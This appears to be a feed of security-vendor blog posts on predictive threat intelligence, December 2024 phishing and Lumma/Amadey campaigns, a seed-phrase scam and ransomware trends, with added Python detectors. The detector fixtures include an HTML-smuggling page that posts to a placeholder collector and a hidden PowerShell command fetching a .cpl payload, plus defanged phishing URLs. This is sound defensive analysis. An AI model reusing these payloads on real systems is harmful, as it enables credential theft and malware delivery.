Predictive Threat Intelligence works by combining AI, machine learning, and advanced analytics to analyze vast amounts of historical and real-time threat data. By understanding the TTPs of cyber adversaries, these tools can identify patterns that signal emerging threats. Here’s how it works in practice:

  1. Data Collection: Predictive threat intelligence platforms collect data from diverse sources, including the surface web, deep web, and dark web, as well as intelligence from private threat-sharing organizations and public cybersecurity resources. These datasets provide crucial insights into potential vulnerabilities and attack vectors.
  2. Data Processing and Analysis: AI models and machine learning algorithms process the collected data, identifying potential threats based on historical attack patterns and emerging trends. For instance, if a surge in phishing attacks targeting a specific industry is detected, AI models can recognize similar characteristics or tactics that might indicate future attacks.
  3. Threat Forecasting: Predictive intelligence platforms then forecast potential threats based on identified trends. For example, AI can predict that a new form of ransomware is gaining traction among cybercriminals, alerting organizations to prepare for a possible attack.
  4. Proactive Response: Once potential threats are identified, the predictive system provides actionable intelligence to help organizations bolster their defenses. These could include patching known vulnerabilities, updating defense strategies, and alerting stakeholders to prepare for specific attack scenarios.
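As an added illustration of the forecasting step (this is not Cyble's code or platform logic), the following Python script applies a rolling z-score to constructed weekly phishing-report counts per sector and raises an early warning where the newest week sits far above that sector's own baseline. The sector names, counts, window length and threshold are all assumptions chosen for the demonstration.

```python
"""Early warning from per-sector phishing volume (added example, not Cyble's code).

A rolling z-score compares the newest weekly count with the preceding weeks;
a large score means the sector is seeing a surge worth warning about.
All counts below are constructed for the demonstration.
"""
from statistics import mean, pstdev

# Constructed weekly phishing-report counts per sector, oldest to newest.
SAMPLE_COUNTS = {
    "healthcare": [40, 42, 38, 45, 41, 39, 44, 43, 95],   # sharp rise in the last week
    "finance":    [60, 58, 63, 61, 59, 62, 60, 64, 65],   # within normal variation
    "retail":     [20, 25, 22, 24, 21, 23, 26, 22, 27],   # mild, not yet a surge
}


def zscore_latest(counts, window=8):
    """Z-score of the newest value against the preceding `window` values.

    A flat history has zero variance; any increase on it is reported as
    infinite (unambiguously anomalous) and no increase as 0.0.
    """
    history = counts[-window - 1:-1]
    latest = counts[-1]
    if len(history) < 3:
        raise ValueError("need at least three baseline points")
    base_mean = mean(history)
    base_sd = pstdev(history)
    if base_sd == 0:
        return float("inf") if latest > base_mean else 0.0
    return (latest - base_mean) / base_sd


def detect_surges(sector_counts, window=8, threshold=3.0):
    """Map each surging sector to its rounded z-score."""
    alerts = {}
    for sector, counts in sector_counts.items():
        z = zscore_latest(counts, window)
        if z >= threshold:
            alerts[sector] = round(z, 2)
    return alerts


def advisories(alerts):
    """Render alerts as early-warning lines a sector CERT could forward."""
    return [
        f"{sector}: latest week is {z} standard deviations above baseline; "
        "expect escalation, prioritise mail filtering and user awareness"
        for sector, z in sorted(alerts.items())
    ]


if __name__ == "__main__":
    for line in advisories(detect_surges(SAMPLE_COUNTS)):
        print(line)
```

The threshold of three standard deviations is deliberately conservative: a real platform would tune it per sector and per source, and would treat the score as one input to an analyst rather than as a verdict.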

The Role of Artificial Intelligence and Machine Learning in Predictive Threat Intelligence

While Predictive Threat Intelligence (PTI) involves more than just AI, artificial intelligence and machine learning play a crucial role in its development. AI’s strength lies in its ability to analyze massive volumes of data, recognize patterns, and make predictions about future events, including cyberattacks.

However, despite the potential, AI and ML alone are not enough to guarantee a fully predictive threat intelligence model. Predictive intelligence is complex, and building reliable, actionable insights requires a balanced integration of human intelligence and automated systems.

The role of AI and machine learning in predictive intelligence includes:

  • Threat Detection: AI can identify anomalous behavior in network traffic, suggesting potential attack attempts.
  • Risk Analysis: By analyzing attack vectors and patterns, AI models can prioritize potential risks based on the severity of the threats and their likelihood of occurring.
  • Automation: Machine learning models can automate certain security functions, such as scanning for vulnerabilities and patching security gaps, without the need for human intervention.

The Challenge of Implementing Predictive Threat Intelligence

While predictive threat intelligence is a highly promising approach, it faces several challenges, especially in terms of implementation.

  1. Data Availability: One of the primary hurdles is the availability of quality data. AI and machine learning models require large, diverse datasets to learn and predict threats accurately. However, data is often fragmented and may not be available in a standardized format, making it difficult for predictive systems to integrate and analyze it effectively.
  2. Complexity of Predictive Models: Predicting future threats is an inherently complex task. As with any prediction, there is a degree of uncertainty, and not every forecast will be accurate. The dynamic nature of cybersecurity means that there will always be a level of unpredictability when it comes to forecasting attacks.
  3. Human Expertise: Although AI and machine learning are powerful tools, human expertise is still necessary to interpret the data and provide context. Human analysts play a critical role in identifying nuanced threats and validating AI predictions to ensure the intelligence is actionable.
  4. Data Privacy and Sharing: Threat intelligence requires data from multiple sources, including potentially sensitive or confidential data. Therefore, sharing threat intelligence can raise privacy concerns, especially in industries like finance or healthcare. Developing systems that allow for safe and ethical sharing of threat data is essential for the success of PTI.

The Future of Predictive Threat Intelligence in 2025

As we look toward 2025, the role of Predictive Threat Intelligence (PTI) in cybersecurity will become increasingly important. By predicting threats before they materialize, PTI will enable organizations to stay one step ahead of cybercriminals, minimizing the risks of cyber threats.

In the near future, advancements in AI-powered threat intelligence will allow organizations to:

  • Improve the automation of cybersecurity workflows, enabling faster, more accurate threat detection and mitigation.
  • Enhance the integration of AI and human expertise, creating a more effective hybrid threat intelligence model.
  • Develop better predictive models that consider a wider array of threat actors and attack vectors, leading to more accurate forecasts.
  • Better share threat intelligence across industries, increasing collaboration and improving overall cybersecurity resilience.

Cyble, an industry leader in Cyber Threat Intelligence, has been at the forefront of this evolution. Cyble’s Cyber Threat Intelligence Platform provides real-time insights into potential threats, combining historical threat data with AI-driven analysis to deliver actionable, predictive intelligence. By integrating diverse data sources, Cyble enables organizations to identify potential threats, prioritize risks, and take proactive measures to mitigate potential breaches.

Why Choose Cyble?

Cyble offers a comprehensive cyber threat intelligence solution that empowers organizations to tackle cyber threats more effectively. With features like dark web monitoring, vulnerability management, and AI-driven analysis, Cyble helps companies not only detect threats but also predict and prevent them before they cause damage.

Cyble’s platform integrates seamlessly with your existing security infrastructure, enabling you to:

  • Gather intelligence from various sources, including the deep and dark web, to identify emerging threats.
  • Augment data with contextual insights for better decision-making.
  • Receive timely notifications about potential threats and vulnerabilities, enabling proactive defense strategies.

Cyble is ready to help businesses understand and navigate this dynamic landscape and stay protected against cyber threats in 2025 and beyond.

Conclusion: Stay Ahead with Cyble

Predictive Threat Intelligence is the future of threat intelligence. By leveraging advanced technologies like AI and machine learning, organizations can anticipate threats before they emerge, minimizing the damage caused by cyberattacks. As we move towards 2025, Predictive Threat Intelligence will be an essential tool in every cybersecurity strategy.

If you want to strengthen your organization’s defenses and stay protected from upcoming threats, Cyble’s threat intelligence platform is your go-to solution. Schedule a demo today and discover how Cyble can help you proactively secure your assets against the threats of tomorrow.

The post Predictive Threat Intelligence – Predictions for 2025: The Future of CTI appeared first on Cyble.

Blog – Cyble – Read More

5 Major Cyber Attacks in December 2024

The cybersecurity research team of ANY.RUN found and analyzed a bunch of emerging threats with the help of our mighty Interactive Sandbox and Threat Intelligence Lookup.

We’ve been sharing their findings via X and in our blog. Here is a summary of the most interesting insights from December 2024.

Phishing Campaigns targeting Microsoft’s Azure Blob Storage

Original post on X

Phishing page: HTML document with a characteristic attribute

Cyber criminals are abusing Microsoft’s cloud-based file storage solution by hosting phishing pages on the service, employing techniques like HTML smuggling.

The phishing pages are HTML documents that contain a block input element with the ID attribute “doom”. The pages include information about users’ software obtained via JScript (OS and browser), to make them more convincing.

Phishing pages on Azure Blob Storage typically have a short lifespan. Attackers may host pages with redirects to phishing sites. With minimal suspicious content, these pages can evade detection slightly longer.

See the analysis session in the ANY.RUN sandbox.

User’s credentials get stolen from fake sign-in form
  • Threat actors leverage the *.blob.core.windows[.]net subdomain to store documents.
  • Company logos are extracted using email address parsing and loaded from the logo[.]clearbit[.]com service.
  • To collect and store stolen data, an HTTP POST request is sent to nocodeform[.]io for collecting form submissions.
AI-generated summary of the attack in the sandbox

Use the following Threat Intelligence Lookup query to find threats targeting the set of requested domains:

See the Tasks tab in the search results for sandbox sessions with malicious URLs

And this search request to find links to HTML pages hosted on Azure Blob Storage.

Microsoft’s OneDrive also fell victim to HTML Blob Smuggling Campaign

The original post on X

As in the attack above, threat actors make victims believe they are logging into a legitimate platform.

Phishing page disguised as OneDrive login form

Using ANY.RUN’s MITM feature, we extracted base.js from the traffic and decoded it. The attack begins with a bait placed on OneDrive. After clicking the link, the user is redirected to the main page containing the HTML Blob Smuggling code. After entering their credentials, victims are redirected to a legitimate website.

Stolen credentials are sent via an HTTP POST request to the C2 server.

Attack details: image sources, stolen data route

The website’s design, background, and icons are stored on IPFS, while lure images, mimicking real services, are hosted on imgur[.]com.

View the attack unfold in the wild: one, other, or yet another sandbox session.
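The two campaigns above (the Azure Blob Storage pages and the OneDrive blob-smuggling page) share a set of static page indicators. The following Python scanner is an added example, not ANY.RUN's tooling, that looks for them in an HTML document: the `doom` input id, logos pulled from logo.clearbit.com, a form posting to nocodeform.io, resources loaded from the hosting services named in the posts, and the decode-and-build-a-Blob pattern of HTML smuggling in inline scripts. Both sample pages are constructed for the demonstration; the `collector.invalid` address is a placeholder, not an indicator from the posts.

```python
"""Static triage of a suspected phishing HTML page (added example, not ANY.RUN's code)."""
from html.parser import HTMLParser
import re

# Indicators taken from the two posts; anything beyond them would be a guess.
LOGO_SERVICES = ("logo.clearbit.com",)
FORM_COLLECTORS = ("nocodeform.io",)
SMUGGLING_APIS = ("new Blob(", "URL.createObjectURL(", "msSaveOrOpenBlob(")
HOSTING_HINTS = ("blob.core.windows.net", "ipfs", "imgur.com")


class PhishHTMLScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or a.get("href") or ""
        if tag == "input" and a.get("id") == "doom":
            self.findings.append("input element with id 'doom' (Azure Blob phishing page marker)")
        if tag == "form" and any(c in a.get("action", "") for c in FORM_COLLECTORS):
            self.findings.append(f"form posts credentials to third-party collector: {a['action']}")
        if tag in ("img", "link") and any(s in src for s in LOGO_SERVICES):
            self.findings.append("company logo fetched from a logo-lookup service")
        for hint in HOSTING_HINTS:
            if hint in src:
                self.findings.append(f"resource loaded from {hint}: {src}")
        if tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            js = "".join(self._script_buf)
            # HTML smuggling: base64 decoded in the browser and wrapped in a Blob.
            if "atob(" in js and any(api in js for api in SMUGGLING_APIS):
                self.findings.append("inline script decodes base64 and builds a Blob (HTML smuggling)")
            for m in re.finditer(r"""fetch\(\s*["']([^"']+)["']""", js):
                self.findings.append(f"script sends data to {m.group(1)}")


def scan_html(doc):
    """Return the list of indicator descriptions found in `doc`."""
    p = PhishHTMLScanner()
    p.feed(doc)
    p.close()
    return p.findings


def verdict(doc, min_findings=2):
    """Crude rule: two or more independent indicators -> treat as phishing."""
    found = scan_html(doc)
    return ("phishing" if len(found) >= min_findings else "inconclusive", found)


# Constructed sample pages (not captured artefacts); collector.invalid is a placeholder.
SAMPLE_PAGE = """<html><head><title>Sign in</title></head><body>
<img src="https://logo.clearbit.com/example.com">
<form action="https://nocodeform.io/f/constructed" method="post">
  <input id="doom" type="hidden" value="x">
  <input name="email"><input name="password" type="password">
</form>
<script>
  var b = new Blob([atob("PGh0bWw+")], {type: "text/html"});
  var u = URL.createObjectURL(b);
  fetch("https://collector.invalid/post", {method: "POST"});
</script>
</body></html>"""

BENIGN_PAGE = """<html><body><form action="/login" method="post">
<input name="user"><input name="pass" type="password"></form></body></html>"""

if __name__ == "__main__":
    print(verdict(SAMPLE_PAGE))
    print(verdict(BENIGN_PAGE))
```

Each indicator on its own is weak (many legitimate sites use a logo lookup service), which is why the verdict requires at least two of them; the list of findings is what an analyst would attach to the sandbox session.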

Phishing links in Microsoft Dynamics 365 web forms

Original post on X

Once again, a Microsoft service is being used for malicious activity. Phishers create forms with embedded links on *.microsoft.com subdomains. Because the links users receive look legitimate, people feel safe opening them.

With TI Lookup, we uncovered a link that tricked users into attempting to access a non-existent PDF file hosted on a Microsoft website.

Phishing URL: hxxps://customervoice.microsoft[.]com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUNVIzNlI5MEhCNlBPRFMwMklUV0JZVTkxVS4u

Malicious page looks like a document hosted within Microsoft service

Use this simple query for TI Lookup to find attacks employing this technique and view them unveiled in our sandbox.

URLs engaged in the attack, found by TI Lookup

Anatomy of a fresh LogoKit

Original post on X

LogoKit is a comprehensive set of phishing tools known for using services that offer logos and screenshots of target websites. Our team has researched the algorithm of such an attack.

Icons, pictures, backgrounds, forms: LogoKit-powered fake page

Let’s look at the example run in our sandbox.

  • The company’s logo is fetched from a legitimate logo storage service: hxxps://logo.clearbit[.]com/<Domain>.
  • The background is retrieved via request to a website screenshot service, using the following template: hxxps://thum[.]io/get/width/<DPI>/https://<Domain>.
  • The domain chain is led by a decoder-redirector: hxxps://asiangrocers[.]store/fri/?haooauvpco=bWlubmllQGRpc25leS5jb20. It is a fake Asian food store website built on a WordPress template, with a domain age of around four years. The template contains email addresses filled with typos.

The decoder-redirector shields the page from analysis and redirects the victim to the actual phishing page.

In our example, the real content of the phishing page and the associated scripts are hosted on the Cloudflare Pages platform. They are stored in the assets/ folder, which contains styles, images, and scripts.

Three scripts with random 10-character names are designed to protect the page from analysis and send stolen data to the threat actors:

  • assets/js/e0nt7h8uiw[.]js
  • assets/js/vddq2ozyod[.]js
  • assets/js/j3046eqymn[.]js

The stolen authentication data is sent to a remote Command and Control server controlled by the attackers via an HTTP POST request containing the following parameters: fox=&con=
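As an added triage example (not ANY.RUN's code), the following Python helpers refang the URLs quoted in the LogoKit section above, decode the base64 parameter carried by the decoder-redirector, and identify the logo and screenshot services the kit uses to dress the page. The `example.com` domain and the width value in the sample thum.io URL stand in for the `<Domain>` and `<DPI>` placeholders in the post; the redirector URL and its parameter are the ones quoted there.

```python
"""Triage helpers for LogoKit-style phishing URLs (added example, not ANY.RUN's code)."""
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qsl

# Services named in the post as the sources of the logo and the background.
BRANDING_SERVICES = {
    "logo.clearbit.com": "company logo lookup",
    "thum.io": "website screenshot (used as page background)",
}

EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{8,}={0,2}$")


def refang(url):
    """Undo common defanging: stray spaces removed, hxxp -> http, [.] -> ."""
    return url.replace(" ", "").replace("hxxp", "http").replace("[.]", ".")


def try_b64(value):
    """Decode base64 (standard or URL-safe, padding optional); None if not text."""
    if not B64_RE.match(value):
        return None
    padded = value + "=" * (-len(value) % 4)   # restore stripped padding
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            return decoder(padded).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue
    return None


def embedded_victim(url):
    """Return the e-mail address hidden in a base64 query parameter, if any."""
    parts = urlsplit(refang(url))
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        text = try_b64(value)
        if text and EMAIL_RE.match(text):
            return text
    return None


def branding_service(url):
    """Name the logo/screenshot service a resource URL points at, or None."""
    host = urlsplit(refang(url)).hostname or ""
    for svc, role in BRANDING_SERVICES.items():
        if host == svc or host.endswith("." + svc):
            return role
    return None


def triage(urls):
    """Summarise one phishing chain: who it was aimed at and how it is dressed."""
    report = {"victim": None, "branding": []}
    for u in urls:
        victim = embedded_victim(u)
        if victim:
            report["victim"] = victim
        role = branding_service(u)
        if role:
            report["branding"].append(role)
    return report


# URLs from the post; example.com and 1200 replace the <Domain> and <DPI> placeholders.
CHAIN = [
    "hxxps:// asiangrocers [.]store/fri/?haooauvpco=bWlubmllQGRpc25leS5jb20",
    "hxxps://logo.clearbit[.]com/example.com",
    "hxxps://thum[.]io/get/width/1200/https://example.com",
]

if __name__ == "__main__":
    print(triage(CHAIN))
```

The decoded parameter tells the responder which mailbox the lure was sent to, which is the first thing to check in the mail gateway logs; the two branding hits explain why the page looked convincing without the kit hosting any brand assets itself.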

Manufacturers, beware: an attack combining Lumma and Amadey is targeting you

Cybercriminals’ tactics against the manufacturing industry have recently been evolving from data encryption toward seizing control of critical infrastructure and stealing sensitive information.

The consequences of such attacks can be severe, leading to theft of intellectual property, disruption of operations, financial losses, and compliance violations. Businesses need to take the threat seriously, understand it, and prepare for it.

Attack used Emmenhtal loader to facilitate infection

This December, we have analyzed a new attack aimed at industrial market players. The mechanics are based on Lumma Stealer and Amadey Bot. The former hunts for valuable information, the latter takes control over the infected systems. View analysis.

  • It all starts with phishing emails with URLs leading users to download LNK files disguised as PDFs;
  • The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded;
  • PowerShell and Windows Management Instrumentation (WMI) commands are utilized to collect detailed information about the victim’s system.

For the details, read our blog post, view the analysis session in our sandbox, and dive deeper with TI Lookup. Use the search query with the name of the threat and the path to one of the malicious files used in the attack.
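The chain described above (LNK lure, PowerShell started through ssh.exe, a CPL file downloaded by the script chain, WMI-based reconnaissance) can be written as a few detection rules over process-creation telemetry. The Python below is an added example, not ANY.RUN's detection content; the events are constructed Sysmon-style records with placeholder hostnames and paths, and the ssh.exe arguments are deliberately left generic.

```python
"""Detection rules for the ssh.exe -> PowerShell -> CPL chain (added example, not ANY.RUN's code)."""
import re

POWERSHELL = ("powershell.exe", "pwsh.exe")


def image_name(path):
    """Bare executable name, lower-cased, from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Constructed Sysmon Event ID 1 (ProcessCreate)-like records. Hostnames, paths
# and PIDs are placeholders; only the parent/child shape reflects the post.
SAMPLE_EVENTS = [
    {"pid": 4012, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 5120, "ppid": 4012, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "ssh.exe <arguments omitted; constructed>"},          # launched from the LNK
    {"pid": 5800, "ppid": 5120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r'powershell.exe -w hidden -c "Invoke-WebRequest -Uri https://stage.placeholder.invalid/stage2.cpl -OutFile $env:TEMP\stage2.cpl"'},
    {"pid": 6000, "ppid": 5800, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Get-CimInstance Win32_OperatingSystem; Get-CimInstance Win32_ComputerSystem"'},
    # Benign activity that must not match: an admin's interactive shell and a normal ssh session.
    {"pid": 6100, "ppid": 4012, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe -c Get-Date"},
    {"pid": 6200, "ppid": 4100, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "ssh.exe user@host.example"},
]

RULES = [
    # PowerShell should never have ssh.exe as its parent on a workstation.
    ("powershell_spawned_by_ssh",
     lambda e: image_name(e["image"]) in POWERSHELL and image_name(e["parent_image"]) == "ssh.exe"),
    # A download cradle whose target is a Control Panel (.cpl) file.
    ("powershell_fetches_cpl",
     lambda e: image_name(e["image"]) in POWERSHELL
               and re.search(r"\.cpl\b", e["cmdline"], re.I) is not None
               and re.search(r"invoke-webrequest|iwr|downloadfile|downloadstring|curl|wget", e["cmdline"], re.I) is not None),
    # WMI queries against Win32_* classes from a scripted PowerShell: host reconnaissance.
    ("powershell_wmi_recon",
     lambda e: image_name(e["image"]) in POWERSHELL
               and re.search(r"get-(cim|wmi)(instance|object)\s+win32_", e["cmdline"], re.I) is not None),
]


def evaluate(events):
    """Return (rule_name, pid) for every event that matches a rule."""
    return [(name, e["pid"]) for e in events for name, pred in RULES if pred(e)]


def descendants(events, root_pid):
    """PIDs transitively spawned by root_pid, to scope the incident around the launcher."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e["ppid"], []).append(e["pid"])
    found, stack = [], [root_pid]
    while stack:
        for child in by_parent.get(stack.pop(), []):
            found.append(child)
            stack.append(child)
    return sorted(found)


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print("process tree under ssh.exe:", descendants(SAMPLE_EVENTS, 5120))
```

The first rule is the highest-value one: it depends only on the parent/child relationship and survives changes to the script contents, while the two command-line rules add confidence and let the responder pull the whole tree under the ssh.exe process for containment.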

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

The post 5 Major Cyber Attacks in December 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Crypto scam: seed phrases shared publicly | Kaspersky official blog

“I have a question. I have USDT stored in my wallet, and I have the seed phrase. How to transfer my funds to another wallet?” — we found a comment like this under a finance-related video on YouTube. And the seed phrase was revealed in full in the comment.

This looked suspicious: even a complete cryptocurrency beginner should know better than to share their seed phrase with the entire world. We were wary, and for a good reason — this comment turned out to be a scam.

Keep reading to find out what can go wrong if you somehow come across someone’s seed phrase…

“I give you the seed phrase, and you help me transfer my money to another wallet”

Let’s start with the basics. A seed phrase is a randomly generated unique sequence of dictionary words that together form a phrase needed to recover access to a cryptowallet. When someone shares their seed phrase — essentially the key to their wallet — it looks extremely suspicious. We then discovered similar comments, each containing the same recovery phrase and a request for help transferring funds to another platform. Notably, all these messages were posted from newly created accounts.

In similar comments written from newly created accounts, supposedly “crypto newbies” generously share their seed phrases

Now, let’s imagine for a second that someone reading one of these comments is a little unscrupulous and, instead of helping the newbie, decides to take a peek inside the wallet (after all, they have the key). Upon opening the wallet, they’re pleasantly surprised to find it stuffed with USDT: a TRC20 token on the TRON network tied to the value of the US dollar. The wallet contains the equivalent of eight thousand dollars. Well, what to do next? The correct answer would be to remember that there’s no such thing as a free lunch, and steer well clear of the wallet.

Finding several thousand US dollars in someone else’s wallet looks like a lucky chance to get rich for an immoral person

However, the scam assumes that our nefarious passerby will want to appropriate all or at least part of the cryptocurrency. But to withdraw USDT, a small fee must be paid in another currency: TRX (the TRON cryptocurrency token). Unfortunately, the wallet doesn’t have enough TRX, so the thief tries to transfer TRX from their own personal wallet — only to discover that the tokens they transferred immediately ended up in a completely different, third wallet.

The list of transactions details the scammers’ earnings

The catch is that the bait is set up as a multi-signature wallet. To authorize outgoing transactions in such wallets, approval from two or more people is required, so transferring USDT to a personal wallet won’t work — even after paying the “commission”.

So, the scammers are impersonating beginners who foolishly share access to their cryptowallets, tricking equally naive thieves — who end up becoming the victims. In this scenario, the scammers are something like digital Robin Hoods, as the scheme primarily targets other crooked individuals. But this twist is nothing new — we’ve previously covered a much more elegant crypto fraud scheme, also aimed at unprincipled people.

How to protect yourself from crypto scams

The way to protect against the above-described scam is quite simple: just be a decent person and don’t try to get into other people’s cryptowallets — even if the seed phrase is left in the comments of your favorite YouTube channel or even slipped under your front door.

In all other cases, crypto asset owners can follow these universal tips and recommendations:

  • Learn about the latest scams aimed at stealing cryptocurrency to stay aware of current trends.
  • Secure your devices with reliable protection.
  • Double-check any information received from strangers: scammers can pose either as beginners in the crypto world or as experienced trading sharks.

Kaspersky official blog – Read More

Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025

Cyble-Blogs-Ransomware

Ransomware attacks have evolved into one of the most significant threats to global cybersecurity. These attacks have shifted from mere opportunistic schemes to advanced operations targeting businesses, critical infrastructure, and even governments. The year 2024 saw ransomware actors innovating at an unprecedented pace, leveraging new technologies and tactics to inflict maximum damage.

With ransomware incidents causing an average cost of $4.54 million per breach—excluding ransom payments—it is imperative for organizations to stay informed and prepared.

This article delves into the top 10 ransomware trends observed in 2024 and provides predictions for what lies ahead in 2025.

1. Double and Triple Extortion Schemes

In 2024, ransomware actors moved beyond simple file encryption to adopt double and triple extortion tactics. These methods involve not only encrypting a victim’s data but also exfiltrating it and threatening to release it publicly unless a ransom is paid. Triple extortion adds another dimension: threatening to disrupt business operations or targeting customers and third parties associated with the victim.

  • Example: A leading healthcare provider in the U.S. fell victim to a triple extortion scheme where attackers encrypted sensitive patient records, exfiltrated the data, and launched Distributed Denial of Service (DDoS) attacks until the ransom was paid. This resulted in financial losses and severe reputational damage.

Prediction for 2025: Expect these multi-layered extortion methods to become the norm as attackers seek greater leverage and higher payouts. Organizations will need to strengthen their data security measures and incident response plans to mitigate these risks.

2. Ransomware-as-a-Service (RaaS) Proliferation

The Ransomware-as-a-Service (RaaS) model gained significant traction in 2024, enabling even low-skilled cybercriminals to launch ransomware attacks. Under this model, ransomware developers provide affiliates with ready-to-use tools and infrastructure in exchange for a share of the profits.

  • Example: Groups like LockBit, BlackCat, and Play have turned RaaS into a booming industry, offering technical support, user manuals, and even marketing strategies to affiliates.

Prediction for 2025: The RaaS ecosystem will expand further, with more criminal groups entering the market. This will likely result in a surge in ransomware incidents targeting small and medium-sized businesses (SMBs) that lack advanced cybersecurity defenses.

3. Data Exfiltration as a Standard Tactic

Stealing sensitive data before encrypting systems has become a standard tactic in ransomware operations. This not only increases the ransom demand but also amplifies the reputational and regulatory consequences for victims.

  • Example: In 2024, a global financial institution faced a ransomware attack where attackers exfiltrated millions of customer records. The breach led to legal consequences and a loss of customer trust, despite the organization’s efforts to recover.

Prediction for 2025: With stricter data privacy regulations like GDPR and CCPA, data exfiltration attacks will pose an even greater risk. Organizations will need to implement stronger encryption and data loss prevention (DLP) solutions to counteract these threats.

4. Zero-Day Exploits and Advanced Phishing

Ransomware groups are increasingly using zero-day vulnerabilities and highly targeted phishing campaigns to gain initial access to victim networks.

  • Example: In 2024, a large technology company was breached when employees fell for an advanced phishing email disguised as a legitimate communication from a trusted vendor. The attackers exploited a zero-day vulnerability to deploy ransomware, causing significant operational downtime.

Prediction for 2025: As more organizations adopt digital transformation initiatives, the attack surface for ransomware groups will expand. Expect more zero-day exploits and socially engineered phishing campaigns aimed at high-value targets.

5. Living Off the Land (LotL) Techniques

Ransomware actors are employing Living Off the Land (LotL) techniques to evade detection by using legitimate tools and processes already present in the victim’s network.

  • Example: In a 2024 attack on a healthcare organization, attackers used PowerShell and Remote Desktop Protocol (RDP) to move laterally within the network without triggering traditional security alarms.

Prediction for 2025: LotL techniques will become more prevalent, making it essential for organizations to implement advanced endpoint detection and response (EDR) solutions and conduct regular audits of privileged accounts.

6. Critical Infrastructure as a Prime Target

Critical infrastructure sectors, including healthcare, energy, and government, have become top targets for ransomware groups. These sectors often lack strong cybersecurity defenses, making them vulnerable to attacks with far-reaching consequences.

  • Example: In 2024, a North American energy provider suffered a ransomware attack that caused widespread power outages and operational disruptions.

Prediction for 2025: With geopolitical tensions on the rise, ransomware attacks on critical infrastructure are expected to increase. Governments and private sectors will need to collaborate on improving the resilience of these essential systems.

7. Industrial Ransomware Targeting Manufacturing

The manufacturing and industrial sectors have seen a rise in ransomware attacks, disrupting production lines and supply chains.

  • Example: In 2024, a global automotive manufacturer was hit by ransomware that halted production for weeks, leading to millions in losses and delayed product deliveries.

Prediction for 2025: As industrial control systems (ICS) and IoT devices become more interconnected, ransomware targeting these environments will grow. Organizations must prioritize securing operational technology (OT) networks.

8. Decline in Average Ransom Payment but Higher Incident Costs

While the average ransom payment dropped from $850,000 to $569,000 in 2024, the overall cost of ransomware incidents has risen due to operational disruptions, data recovery expenses, and reputational damage.

  • Example: A mid-sized retail company paid a lower ransom in 2024 but incurred over $3 million in total costs due to lost sales, customer churn, and recovery efforts.

Prediction for 2025: Organizations may see lower ransom demands, but the indirect costs of ransomware attacks will continue to climb. This highlights the importance of proactive defenses and comprehensive incident response plans.

9. Evolving Ransomware Variants

New ransomware variants with enhanced capabilities emerged in 2024, including Akira and BlackCat, which feature advanced encryption and stealth techniques.

  • Example: Akira ransomware targeted a European bank, using multi-layered encryption that rendered recovery nearly impossible without paying the ransom.

Prediction for 2025: Ransomware variants will continue to evolve, focusing on bypassing traditional defenses and targeting cloud environments and hybrid work setups.

10. Increased International Collaboration and Crackdowns

Law enforcement agencies and cybersecurity organizations have intensified their efforts to combat ransomware through international collaboration. In 2024, several high-profile ransomware groups were dismantled, and stolen funds were recovered.

  • Example: A joint operation by the FBI and Europol in 2024 disrupted a major ransomware operation, recovering $20 million in ransom payments.

Prediction for 2025: While these crackdowns are promising, ransomware groups will adapt and find new ways to evade law enforcement. Continued international collaboration will be critical to countering these threats.

Looking Ahead to 2025

As we move into 2025, the ransomware landscape will continue to evolve. Here are some key predictions:

  1. AI-Powered Ransomware: Attackers will leverage artificial intelligence to automate ransomware campaigns and improve phishing success rates.
  2. Focus on Cloud Environments: With more businesses migrating to the cloud, ransomware groups will target cloud-native applications and services.
  3. Stricter Regulations: Governments will implement more stringent reporting and compliance requirements for ransomware incidents.
  4. Cyber Insurance Challenges: The cost of cyber insurance will rise, with stricter conditions for coverage related to ransomware.
  5. Post-Attack Recovery Services: Organizations will invest more in post-attack recovery services, such as takedown solutions and data restoration.

To Sum Up

The ransomware trends of 2024 highlight threat actors’ adaptability and ingenuity. To stay ahead of these evolving threats, organizations must adopt a proactive approach, including strong cybersecurity measures, employee awareness programs, and collaborative efforts with industry peers and law enforcement.

